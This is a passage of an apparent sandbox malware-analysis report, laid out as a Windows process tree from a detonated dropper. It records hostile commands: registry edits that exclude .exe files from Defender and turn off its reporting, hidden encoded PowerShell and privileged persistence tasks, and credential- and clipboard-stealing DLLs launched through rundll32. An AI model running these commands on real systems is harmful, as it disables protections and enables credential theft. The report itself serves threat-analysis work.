- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe"
    3⤵
    PID:7716
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
      4⤵
      PID:7996
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
        5⤵
        
        PID:8020
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:8
        5⤵
        
        PID:8528
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:2
        5⤵
        
        PID:8520
- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe"
    3⤵
    PID:8900
- - C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe
    "C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe"
    3⤵
    PID:7384
- C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe
  "C:\Users\Admin\Documents\GuardFox\acxRhwdrPnMMTMfVizASiPHK.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5560
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 2552
    3⤵
    - Program crash
    PID:6152
- C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe
  "C:\Users\Admin\Documents\GuardFox\IcOQ9mob9EmjLq5Y8jl5i8Ks.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5548
- - C:\Users\Admin\AppData\Local\Temp\7zS7A0D.tmp\Install.exe
    .\Install.exe
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\7zS8A2A.tmp\Install.exe
      .\Install.exe /UPdidFN "525403" /S
      4⤵
      PID:5400
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        5⤵
        
        PID:4000
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        6⤵
        
        PID:5800
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        7⤵
        
        PID:5804
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        7⤵
        
        PID:4316
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        5⤵
        
        PID:4124
      - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        6⤵
        
        PID:5884
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        7⤵
        
        PID:5840
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        7⤵
        
        PID:5272
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gmMtRmbFQ" /SC once /ST 02:20:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        5⤵
        Creates scheduled task(s)
        
        PID:4024
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gmMtRmbFQ"
        5⤵
        
        PID:5772
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gmMtRmbFQ"
        5⤵
        
        PID:6540
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bNEqRyuTSpchqwHoUe" /SC once /ST 11:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe\" Lw /yBsite_idjQg 525403 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:5076
- C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe
  "C:\Users\Admin\Documents\GuardFox\5hxqpp4yZ9PzDLBQDKZWY5pP.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5540
- C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe
  "C:\Users\Admin\Documents\GuardFox\63ijbZSUSBbYSuS8tRrtLvEY.exe"
  2⤵
  PID:5572
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4356
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4356 -s 500
      4⤵
      Program crash
      PID:2752
- C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe
  "C:\Users\Admin\Documents\GuardFox\Uihk1vSUEflfVRVgJ3Rfr90q.exe"
  2⤵
  PID:2312
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    PID:6640
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
      4⤵
      PID:8100
- C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe
  "C:\Users\Admin\Documents\GuardFox\r2UFDQC620faMK7tnGEjaJBS.exe"
  2⤵
  PID:3392
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4664
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5660
- C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe
  "C:\Users\Admin\Documents\GuardFox\HXXJISDL4_QGsMVnErfk32Xh.exe"
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5200
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6380
- - C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe
    "C:\Users\Admin\AppData\Local\Temp\heidieBb12zNuQf9m\_YQeNBS1zclf3QHQ8lIb.exe"
    3⤵
    PID:6868
- C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe
  "C:\Users\Admin\Documents\GuardFox\cbBCotuiPHjezDdTSgibviGl.exe"
  2⤵
  PID:4064
- C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe
  "C:\Users\Admin\Documents\GuardFox\DCEVEfkW_wIVRTVwXOeHDfD8.exe"
  2⤵
  PID:1284
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    PID:3648
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
      4⤵
      PID:6096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:2
      4⤵
      PID:5228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
      4⤵
      PID:440
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:8
      4⤵
      PID:4584
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2996 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
      4⤵
      PID:1628
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3004 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
      4⤵
      PID:4004
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4456 --field-trial-handle=1992,i,11128983163386996573,12680999490583782730,131072 /prefetch:1
      4⤵
      PID:4288
- C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
  "C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
  2⤵
  PID:4740
- - C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe
    "C:\Users\Admin\Documents\GuardFox\4g7Z_VD4UrpGud17F92Zl4Yl.exe"
    3⤵
    PID:5176
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 600
      4⤵
      Program crash
      PID:5844
- C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe
  "C:\Users\Admin\Documents\GuardFox\z_9pT7lPvHJWD2vdqiPXgDd8.exe"
  2⤵
  PID:4084
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5760 -s 420
      4⤵
      Program crash
      PID:3516
- C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe
  "C:\Users\Admin\Documents\GuardFox\L_WvMAjCxMVRwXtcjB8fqJFZ.exe"
  2⤵
  PID:224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5636
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5696
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5696 -s 420
      4⤵
      Program crash
      PID:4796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3976

C:\Users\Admin\Desktop\setup.exe
"C:\Users\Admin\Desktop\setup.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5612 -ip 5612
1⤵
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5600 -ip 5600
1⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5612 -ip 5612
1⤵
PID:5320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5176 -ip 5176
1⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5696 -ip 5696
1⤵
PID:1972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5760 -ip 5760
1⤵
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4356 -ip 4356
1⤵
PID:3052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5612 -ip 5612
1⤵
PID:4660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5612 -ip 5612
1⤵
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5612 -ip 5612
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5612 -ip 5612
1⤵
PID:1812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5612 -ip 5612
1⤵
PID:4164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5612 -ip 5612
1⤵
PID:2608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5612 -ip 5612
1⤵
PID:2752

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff39cb3cb8,0x7fff39cb3cc8,0x7fff39cb3cd8
1⤵
PID:2980

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6060

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1984

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
PID:7444
- C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe
  "C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe"
  2⤵
  PID:9120
- C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe
  "C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe"
  2⤵
  PID:5328
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
    3⤵
    PID:1520
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
      4⤵
      PID:496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3868 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
      4⤵
      PID:6124
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
      4⤵
      PID:1508
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
      4⤵
      PID:1916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1880 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
      4⤵
      PID:5656
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1848 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
      4⤵
      PID:2108
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:2
      4⤵
      PID:5468
- C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe
  "C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe"
  2⤵
  PID:6420
- - C:\ProgramData\viewer\viewer.exe
    "C:\ProgramData\viewer\viewer.exe"
    3⤵
    PID:8464
  - - \??\c:\program files (x86)\internet explorer\iexplore.exe
      "c:\program files (x86)\internet explorer\iexplore.exe"
      4⤵
      PID:6840
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
        5⤵
        
        PID:8084
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wwjqtyjvqrnspz"
        5⤵
        
        PID:2476
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zywjtjtwezfxafkvtp"
        5⤵
        
        PID:9020
    - - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
        5⤵
        
        PID:8232
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  PID:8476
- C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe
  "C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe"
  2⤵
  PID:4740
- C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe
  "C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe"
  2⤵
  PID:2816
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  PID:4204
- C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe
  "C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe"
  2⤵
  PID:1588
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8792
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8792 -s 1108
      4⤵
      Program crash
      PID:5264
- C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe
  "C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe"
  2⤵
  PID:5520
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 380
    3⤵
    - Program crash
    PID:8412
- C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe
  "C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe"
  2⤵
  PID:9208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7372
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1176
      4⤵
      Program crash
      PID:2532
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1140
      4⤵
      Program crash
      PID:3972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1196
      4⤵
      Program crash
      PID:5772
- C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe
  "C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe"
  2⤵
  PID:2784
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:8328
- C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe
  "C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe"
  2⤵
  PID:8328
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
